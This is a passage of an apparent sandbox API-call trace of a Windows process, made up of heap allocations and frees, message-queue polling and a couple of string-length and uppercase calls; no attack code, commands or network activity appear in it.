(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0145.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b12b8 [0145.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a93a8 | out: hHeap=0x25c0000) returned 1 [0145.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a93d8 | out: hHeap=0x25c0000) returned 1 [0145.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12c8 | out: hHeap=0x25c0000) returned 1 [0145.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0145.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12b8 | out: hHeap=0x25c0000) returned 1 [0145.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9408 | out: hHeap=0x25c0000) returned 1 [0145.325] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.325] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12b8 [0145.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9408 [0145.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0145.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12c8 [0145.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a93d8 [0145.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a93a8 [0145.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12e8 [0145.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9468 [0145.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9450 [0145.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12d8 [0145.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a93f0 [0145.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12d8 | out: hHeap=0x25c0000) returned 1 [0145.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9438 [0145.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12d8 [0145.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12d8 | out: hHeap=0x25c0000) returned 1 [0145.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0145.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12d8 [0145.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12d8 | out: hHeap=0x25c0000) returned 1 [0145.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a92a0 [0145.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b12d8 [0145.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0145.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a93f0 | out: hHeap=0x25c0000) returned 1 [0145.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9450 | out: hHeap=0x25c0000) returned 1 [0145.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9438 | out: hHeap=0x25c0000) returned 1 [0145.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0145.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9468 | out: hHeap=0x25c0000) returned 1 [0145.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12e8 | out: hHeap=0x25c0000) returned 1 [0145.327] lstrlenW (lpString="6C") returned 2 [0145.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a92a0 | out: hHeap=0x25c0000) returned 1 [0145.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12d8 | out: hHeap=0x25c0000) returned 1 [0145.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0145.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a93a8 | out: hHeap=0x25c0000) returned 1 [0145.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a93d8 | out: hHeap=0x25c0000) returned 1 [0145.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12c8 | out: hHeap=0x25c0000) returned 1 [0145.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a93d8 [0145.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a93a8 [0145.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b12c8 [0145.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0145.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9408 | out: hHeap=0x25c0000) returned 1 [0145.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12b8 | out: hHeap=0x25c0000) returned 1 [0145.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x2415f90 [0145.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a92d0 | out: hHeap=0x25c0000) returned 1 [0145.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a93a8 | out: hHeap=0x25c0000) returned 1 [0145.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12c8 | out: hHeap=0x25c0000) returned 1 [0145.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a93d8 | out: hHeap=0x25c0000) returned 1 [0145.327] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.327] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12c8 [0145.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a93d8 [0145.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a93a8 [0145.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12b8 [0145.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a92d0 [0145.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9408 [0145.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12d8 [0145.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0145.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0145.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12e8 [0145.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a92a0 [0145.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12e8 | out: hHeap=0x25c0000) returned 1 [0145.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9468 [0145.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12e8 [0145.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12e8 | out: hHeap=0x25c0000) returned 1 [0145.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0145.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12e8 [0145.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12e8 | out: hHeap=0x25c0000) returned 1 [0145.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9438 [0145.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b12e8 [0145.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9450 [0145.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a92a0 | out: hHeap=0x25c0000) returned 1 [0145.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0145.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9468 | out: hHeap=0x25c0000) returned 1 [0145.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0145.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0145.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12d8 | out: hHeap=0x25c0000) returned 1 [0145.328] lstrlenW (lpString="6C") returned 2 [0145.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9438 | out: hHeap=0x25c0000) returned 1 [0145.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12e8 | out: hHeap=0x25c0000) returned 1 [0145.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9450 | out: hHeap=0x25c0000) returned 1 [0145.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9408 | out: hHeap=0x25c0000) returned 1 [0145.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a92d0 | out: hHeap=0x25c0000) returned 1 [0145.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12b8 | out: hHeap=0x25c0000) returned 1 [0145.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a92d0 [0145.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9408 [0145.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b12b8 [0145.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a93a8 | out: hHeap=0x25c0000) returned 1 [0145.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a93d8 | out: hHeap=0x25c0000) returned 1 [0145.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12c8 | out: hHeap=0x25c0000) returned 1 [0145.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9408 | out: hHeap=0x25c0000) returned 1 [0145.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12b8 | out: hHeap=0x25c0000) returned 1 [0145.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a92d0 | out: hHeap=0x25c0000) returned 1 [0145.329] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d720 | out: hHeap=0x25c0000) returned 1 [0145.329] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12b8 [0145.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a92d0 [0145.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12b8 | out: hHeap=0x25c0000) returned 1 [0145.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9408 [0145.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a92d0 | out: hHeap=0x25c0000) returned 1 [0145.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a92d0 [0145.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9408 | out: hHeap=0x25c0000) returned 1 [0145.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0145.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9300 | out: hHeap=0x25c0000) returned 1 [0145.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9330 | out: hHeap=0x25c0000) returned 1 [0145.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24af6d8 | out: hHeap=0x25c0000) returned 1 [0145.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0145.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24af778 | out: hHeap=0x25c0000) returned 1 [0145.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9210 | out: hHeap=0x25c0000) returned 1 [0145.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9348 | out: hHeap=0x25c0000) returned 1 [0145.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1068 | out: hHeap=0x25c0000) returned 1 [0145.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24af7a0 | out: hHeap=0x25c0000) returned 1 [0145.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9360 | out: hHeap=0x25c0000) returned 1 [0145.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9240 | out: hHeap=0x25c0000) returned 1 [0145.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24afca0 | out: hHeap=0x25c0000) returned 1 [0145.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12a8 | out: hHeap=0x25c0000) returned 1 [0145.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24afc78 | out: hHeap=0x25c0000) returned 1 [0145.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9270 | out: hHeap=0x25c0000) returned 1 [0145.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1288 | out: hHeap=0x25c0000) returned 1 [0145.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a93c0 | out: hHeap=0x25c0000) returned 1 [0145.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9228 | out: hHeap=0x25c0000) returned 1 [0145.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9378 | out: hHeap=0x25c0000) returned 1 [0145.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9168 | out: hHeap=0x25c0000) returned 1 [0145.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1258 | out: hHeap=0x25c0000) returned 1 [0145.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8f40 | out: hHeap=0x25c0000) returned 1 [0145.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0145.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9318 | out: hHeap=0x25c0000) returned 1 [0145.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9318 [0145.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a92d0 | out: hHeap=0x25c0000) returned 1 [0145.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a92d0 [0145.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8f40 [0145.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0145.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24afc78 [0145.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9168 [0145.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1258 [0145.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9168 | out: hHeap=0x25c0000) returned 1 [0145.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24afca0 [0145.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9168 [0145.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9378 [0145.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1288 [0145.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a92d0 | out: hHeap=0x25c0000) returned 1 [0145.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24af7a0 [0145.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b12a8 [0145.342] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24af7a0 | out: hHeap=0x25c0000) returned 1 [0145.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12a8 | out: hHeap=0x25c0000) returned 1 [0145.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a92d0 [0145.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b12a8 [0145.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9228 [0145.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a93c0 [0145.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1068 [0145.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0145.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0145.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9270 [0145.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1068 | out: hHeap=0x25c0000) returned 1 [0145.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9240 [0145.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24af7a0 [0145.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9360 [0145.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1068 [0145.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9360 | out: hHeap=0x25c0000) returned 1 [0145.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24af778 [0145.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9360 [0145.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9348 [0145.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0145.343] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9210 [0145.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0145.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9210 | out: hHeap=0x25c0000) returned 1 [0145.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24af6d8 [0145.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9210 [0145.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9330 [0145.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b12b8 [0145.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24afcc8 [0145.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9300 [0145.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b12c8 [0145.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9300 | out: hHeap=0x25c0000) returned 1 [0145.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24afcf0 [0145.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9300 [0145.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9408 [0145.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24af6d8 | out: hHeap=0x25c0000) returned 1 [0145.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0145.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9210 | out: hHeap=0x25c0000) returned 1 [0145.344] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24af6d8 [0145.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9210 [0145.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0145.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a93d8 [0145.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12e8 [0145.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12e8 | out: hHeap=0x25c0000) returned 1 [0145.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12e8 [0145.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a93a8 [0145.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9450 [0145.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12d8 [0145.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9438 [0145.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12d8 | out: hHeap=0x25c0000) returned 1 [0145.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9438 | out: hHeap=0x25c0000) returned 1 [0145.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9450 | out: hHeap=0x25c0000) returned 1 [0145.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a93a8 | out: hHeap=0x25c0000) returned 1 [0145.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12e8 | out: hHeap=0x25c0000) returned 1 [0145.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12e8 [0145.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12e8 | out: hHeap=0x25c0000) returned 1 [0145.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d720 [0145.345] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12e8 [0145.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a93a8 [0145.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9450 [0145.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12d8 [0145.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9438 [0145.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0145.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12f8 [0145.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0145.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9468 [0145.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1308 [0145.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0145.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1308 | out: hHeap=0x25c0000) returned 1 [0145.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a92a0 [0145.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1308 [0145.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1308 | out: hHeap=0x25c0000) returned 1 [0145.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a93f0 [0145.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1308 [0145.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1308 | out: hHeap=0x25c0000) returned 1 [0145.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9480 [0145.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1308 [0145.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9498 [0145.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0145.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9468 | out: hHeap=0x25c0000) returned 1 [0145.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a92a0 | out: hHeap=0x25c0000) returned 1 [0145.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a93f0 | out: hHeap=0x25c0000) returned 1 [0145.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0145.347] HeapFree (in: hHeap=0x25c0000, 